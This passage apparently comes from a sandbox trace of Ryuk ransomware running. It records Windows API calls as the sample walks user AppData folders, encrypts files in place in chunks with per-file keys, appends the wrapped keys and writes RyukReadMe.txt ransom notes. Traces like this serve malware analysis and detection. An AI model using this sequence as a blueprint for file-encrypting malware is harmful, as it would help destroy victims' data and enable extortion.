dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29aa968*=0x60) returned 1 [0149.010] SetFilePointer (in: hFile=0x19c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0149.010] WriteFile (in: hFile=0x19c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x60, lpNumberOfBytesWritten=0x29aa970, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29aa970*=0x60, lpOverlapped=0x0) returned 1 [0149.010] WriteFile (in: hFile=0x19c, lpBuffer=0x29aa9b0*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29aa974, lpOverlapped=0x0 | out: lpBuffer=0x29aa9b0*, lpNumberOfBytesWritten=0x29aa974*=0x6, lpOverlapped=0x0) returned 1 [0149.010] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29aa980 | out: pbData=0x0*, pdwDataLen=0x29aa980*=0x10c) returned 1 [0149.010] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29aaa00, pdwDataLen=0x29aa980 | out: pbData=0x29aaa00*, pdwDataLen=0x29aa980*=0x10c) returned 1 [0149.010] WriteFile (in: hFile=0x19c, lpBuffer=0x29aaa00*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29aa974, lpOverlapped=0x0 | out: lpBuffer=0x29aaa00*, lpNumberOfBytesWritten=0x29aa974*=0x10c, lpOverlapped=0x0) returned 1 [0149.011] CloseHandle (hObject=0x19c) returned 1 [0149.413] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0149.417] CryptDestroyKey (hKey=0x3b8690) returned 1 [0149.417] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0149.417] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0149.417] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0149.417] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\fda992c8d564f97e48410a19a2e459f6_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", dwFileAttributes=0x80) returned 1 [0149.418] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\fda992c8d564f97e48410a19a2e459f6_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\crypto\\rsa\\s-1-5-21-3388679973-3930757225-3770151564-1000\\fda992c8d564f97e48410a19a2e459f6_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0149.418] GetFileSizeEx (in: hFile=0x19c, lpFileSize=0x29aa978 | out: lpFileSize=0x29aa978*=61) returned 1 [0149.418] GetFileSizeEx (in: hFile=0x19c, lpFileSize=0x29aa988 | out: lpFileSize=0x29aa988*=61) returned 1 [0149.418] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29aa960 | out: phKey=0x29aa960*=0x3b8690) returned 1 [0149.418] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0149.418] SetFilePointer (in: hFile=0x19c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0149.418] ReadFile (in: hFile=0x19c, lpBuffer=0x2760000, nNumberOfBytesToRead=0x3d, lpNumberOfBytesRead=0x29aa970, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29aa970*=0x3d, lpOverlapped=0x0) returned 1 [0149.419] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29aa96c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29aa96c*=0xf4250) returned 1 [0149.419] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29aa968*=0x3d, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29aa968*=0x40) returned 1 [0149.419] SetFilePointer (in: hFile=0x19c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0149.419] WriteFile (in: hFile=0x19c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x40, lpNumberOfBytesWritten=0x29aa970, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29aa970*=0x40, lpOverlapped=0x0) returned 1 [0149.419] WriteFile (in: hFile=0x19c, lpBuffer=0x29aa9b0*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29aa974, lpOverlapped=0x0 | out: lpBuffer=0x29aa9b0*, lpNumberOfBytesWritten=0x29aa974*=0x6, lpOverlapped=0x0) returned 1 [0149.419] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29aa980 | out: pbData=0x0*, pdwDataLen=0x29aa980*=0x10c) returned 1 [0149.419] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29aaa00, pdwDataLen=0x29aa980 | out: pbData=0x29aaa00*, pdwDataLen=0x29aa980*=0x10c) returned 1 [0149.420] WriteFile (in: hFile=0x19c, lpBuffer=0x29aaa00*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29aa974, lpOverlapped=0x0 | out: lpBuffer=0x29aaa00*, lpNumberOfBytesWritten=0x29aa974*=0x10c, lpOverlapped=0x0) returned 1 [0149.420] CloseHandle (hObject=0x19c) returned 1 [0149.436] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0149.440] CryptDestroyKey (hKey=0x3b8690) returned 1 [0149.440] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0149.440] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0 [0149.440] FindClose (in: hFindFile=0x3a2fa0 | out: hFindFile=0x3a2fa0) returned 1 [0149.440] SetLastError (dwErrCode=0x0) [0149.440] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\crypto\\rsa\\s-1-5-21-3388679973-3930757225-3770151564-1000\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0149.441] GetLastError () returned 0x0 [0149.441] WriteFile (in: hFile=0x198, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ab330*=0x320, lpOverlapped=0x0) returned 1 [0149.442] CloseHandle (hObject=0x198) returned 1 [0149.442] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0 [0149.442] FindClose (in: hFindFile=0x3a2f40 | out: hFindFile=0x3a2f40) returned 1 [0149.442] SetLastError (dwErrCode=0x0) [0149.442] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\crypto\\rsa\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0149.442] GetLastError () returned 0xb7 [0149.442] CloseHandle (hObject=0x194) returned 1 [0149.442] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0149.442] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0149.442] SetLastError (dwErrCode=0x0) [0149.442] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\crypto\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0149.442] GetLastError () returned 0xb7 [0149.442] CloseHandle (hObject=0x190) returned 1 [0149.442] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0149.442] SetLastError (dwErrCode=0x0) [0149.442] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0149.443] GetLastError () returned 0xb7 [0149.443] CloseHandle (hObject=0x190) returned 1 [0149.443] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0149.443] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0149.443] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0149.443] SetLastError (dwErrCode=0x0) [0149.443] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\document building blocks\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0149.443] GetLastError () returned 0x0 [0149.443] WriteFile (in: hFile=0x194, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29abae0*=0x320, lpOverlapped=0x0) returned 1 [0149.444] CloseHandle (hObject=0x194) returned 1 [0149.444] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3a2f40 [0149.444] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0149.444] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0149.444] SetLastError (dwErrCode=0x0) [0149.445] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\document building blocks\\1033\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0149.445] GetLastError () returned 0x0 [0149.445] WriteFile (in: hFile=0x198, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ab330*=0x320, lpOverlapped=0x0) returned 1 [0149.445] CloseHandle (hObject=0x198) returned 1 [0149.446] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\*.*", lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0x3a2fa0 [0149.446] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0149.446] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0149.446] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0149.446] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\Built-In Building Blocks.dotx", dwFileAttributes=0x80) returned 1 [0149.446] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\Built-In Building Blocks.dotx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\document building blocks\\1033\\14\\built-in building blocks.dotx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0149.447] GetFileSizeEx (in: hFile=0x19c, lpFileSize=0x29aa978 | out: lpFileSize=0x29aa978*=4187307) returned 1 [0149.447] GetFileSizeEx (in: hFile=0x19c, lpFileSize=0x29aa988 | out: lpFileSize=0x29aa988*=4187307) returned 1 [0149.447] SetFilePointerEx (in: hFile=0x19c, liDistanceToMove=0x3fe389, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0149.447] ReadFile (in: hFile=0x19c, lpBuffer=0x29aa9d8, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29aa998, lpOverlapped=0x0 | out: lpBuffer=0x29aa9d8*, lpNumberOfBytesRead=0x29aa998*=0x19, lpOverlapped=0x0) returned 1 [0149.448] SetFilePointer (in: hFile=0x19c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0149.448] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29aa960 | out: phKey=0x29aa960*=0x3b8690) returned 1 [0149.448] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0149.448] SetFilePointer (in: hFile=0x19c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0149.449] ReadFile (in: hFile=0x19c, lpBuffer=0x2760000, nNumberOfBytesToRead=0xf4240, lpNumberOfBytesRead=0x29aa970, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29aa970*=0xf4240, lpOverlapped=0x0) returned 1 [0149.466] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29aa96c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29aa96c*=0xf4240) returned 1 [0149.466] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29aa968*=0xf4240, dwBufLen=0xf4240 | out: pbData=0x2760000*, pdwDataLen=0x29aa968*=0xf4240) returned 1 [0149.471] SetFilePointer (in: hFile=0x19c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0149.471] WriteFile (in: hFile=0x19c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xf4240, lpNumberOfBytesWritten=0x29aa970, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29aa970*=0xf4240, lpOverlapped=0x0) returned 1 [0149.474] SetFilePointer (in: hFile=0x19c, lDistanceToMove=1000000, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xf4240 [0149.474] ReadFile (in: hFile=0x19c, lpBuffer=0x2760000, nNumberOfBytesToRead=0xf4240, lpNumberOfBytesRead=0x29aa970, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29aa970*=0xf4240, lpOverlapped=0x0) returned 1 [0149.488] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29aa96c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29aa96c*=0xf4240) returned 1 [0149.488] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29aa968*=0xf4240, dwBufLen=0xf4240 | out: pbData=0x2760000*, pdwDataLen=0x29aa968*=0xf4240) returned 1 [0149.493] SetFilePointer (in: hFile=0x19c, lDistanceToMove=1000000, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xf4240 [0149.493] WriteFile (in: hFile=0x19c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xf4240, lpNumberOfBytesWritten=0x29aa970, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29aa970*=0xf4240, lpOverlapped=0x0) returned 1 [0149.496] SetFilePointer (in: hFile=0x19c, lDistanceToMove=2000000, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1e8480 [0149.496] ReadFile (in: hFile=0x19c, lpBuffer=0x2760000, nNumberOfBytesToRead=0xf4240, lpNumberOfBytesRead=0x29aa970, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29aa970*=0xf4240, lpOverlapped=0x0) returned 1 [0149.518] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29aa96c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29aa96c*=0xf4240) returned 1 [0149.518] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29aa968*=0xf4240, dwBufLen=0xf4240 | out: pbData=0x2760000*, pdwDataLen=0x29aa968*=0xf4240) returned 1 [0149.523] SetFilePointer (in: hFile=0x19c, lDistanceToMove=2000000, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1e8480 [0149.523] WriteFile (in: hFile=0x19c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xf4240, lpNumberOfBytesWritten=0x29aa970, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29aa970*=0xf4240, lpOverlapped=0x0) returned 1 [0149.526] SetFilePointer (in: hFile=0x19c, lDistanceToMove=3000000, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2dc6c0 [0149.526] ReadFile (in: hFile=0x19c, lpBuffer=0x2760000, nNumberOfBytesToRead=0xf4240, lpNumberOfBytesRead=0x29aa970, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29aa970*=0xf4240, lpOverlapped=0x0) returned 1 [0149.535] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29aa96c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29aa96c*=0xf4240) returned 1 [0149.535] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29aa968*=0xf4240, dwBufLen=0xf4240 | out: pbData=0x2760000*, pdwDataLen=0x29aa968*=0xf4240) returned 1 [0149.540] SetFilePointer (in: hFile=0x19c, lDistanceToMove=3000000, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2dc6c0 [0149.540] WriteFile (in: hFile=0x19c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xf4240, lpNumberOfBytesWritten=0x29aa970, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29aa970*=0xf4240, lpOverlapped=0x0) returned 1 [0149.543] SetFilePointer (in: hFile=0x19c, lDistanceToMove=4000000, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3d0900 [0149.544] ReadFile (in: hFile=0x19c, lpBuffer=0x2760000, nNumberOfBytesToRead=0x2dbab, lpNumberOfBytesRead=0x29aa970, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29aa970*=0x2dbab, lpOverlapped=0x0) returned 1 [0149.544] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29aa96c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29aa96c*=0xf4250) returned 1 [0149.544] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29aa968*=0x2dbab, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29aa968*=0x2dbb0) returned 1 [0149.545] SetFilePointer (in: hFile=0x19c, lDistanceToMove=4000000, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3d0900 [0149.545] WriteFile (in: hFile=0x19c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x2dbb0, lpNumberOfBytesWritten=0x29aa970, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29aa970*=0x2dbb0, lpOverlapped=0x0) returned 1 [0149.545] WriteFile (in: hFile=0x19c, lpBuffer=0x29aa9b0*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29aa974, lpOverlapped=0x0 | out: lpBuffer=0x29aa9b0*, lpNumberOfBytesWritten=0x29aa974*=0x6, lpOverlapped=0x0) returned 1 [0149.545] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29aa980 | out: pbData=0x0*, pdwDataLen=0x29aa980*=0x10c) returned 1 [0149.545] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29aaa00, pdwDataLen=0x29aa980 | out: pbData=0x29aaa00*, pdwDataLen=0x29aa980*=0x10c) returned 1 [0149.546] WriteFile (in: hFile=0x19c, lpBuffer=0x29aaa00*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29aa974, lpOverlapped=0x0 | out: lpBuffer=0x29aaa00*, lpNumberOfBytesWritten=0x29aa974*=0x10c, lpOverlapped=0x0) returned 1 [0149.546] CloseHandle (hObject=0x19c) returned 1 [0149.763] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0149.767] CryptDestroyKey (hKey=0x3b8690) returned 1 [0149.767] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0149.767] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0 [0149.767] FindClose (in: hFindFile=0x3a2fa0 | out: hFindFile=0x3a2fa0) returned 1 [0149.768] SetLastError (dwErrCode=0x0) [0149.768] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\document building blocks\\1033\\14\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0149.768] GetLastError () returned 0x0 [0149.768] WriteFile (in: hFile=0x198, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ab330*=0x320, lpOverlapped=0x0) returned 1 [0149.769] CloseHandle (hObject=0x198) returned 1 [0149.769] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0 [0149.769] FindClose (in: hFindFile=0x3a2f40 | out: hFindFile=0x3a2f40) returned 1 [0149.769] SetLastError (dwErrCode=0x0) [0149.769] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\document building blocks\\1033\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0149.769] GetLastError () returned 0xb7 [0149.769] CloseHandle (hObject=0x194) returned 1 [0149.769] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0149.769] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0149.769] SetLastError (dwErrCode=0x0) [0149.769] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\document building blocks\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0149.769] GetLastError () returned 0xb7 [0149.769] CloseHandle (hObject=0x190) returned 1 [0149.770] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0149.770] SetLastError (dwErrCode=0x0) [0149.770] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0149.770] GetLastError () returned 0xb7 [0149.770] CloseHandle (hObject=0x190) returned 1 [0149.770] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0149.770] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0149.770] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0149.770] SetLastError (dwErrCode=0x0) [0149.770] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\excel\\ryukreadme.txt"), dwDesiredAccess=0x40000000, 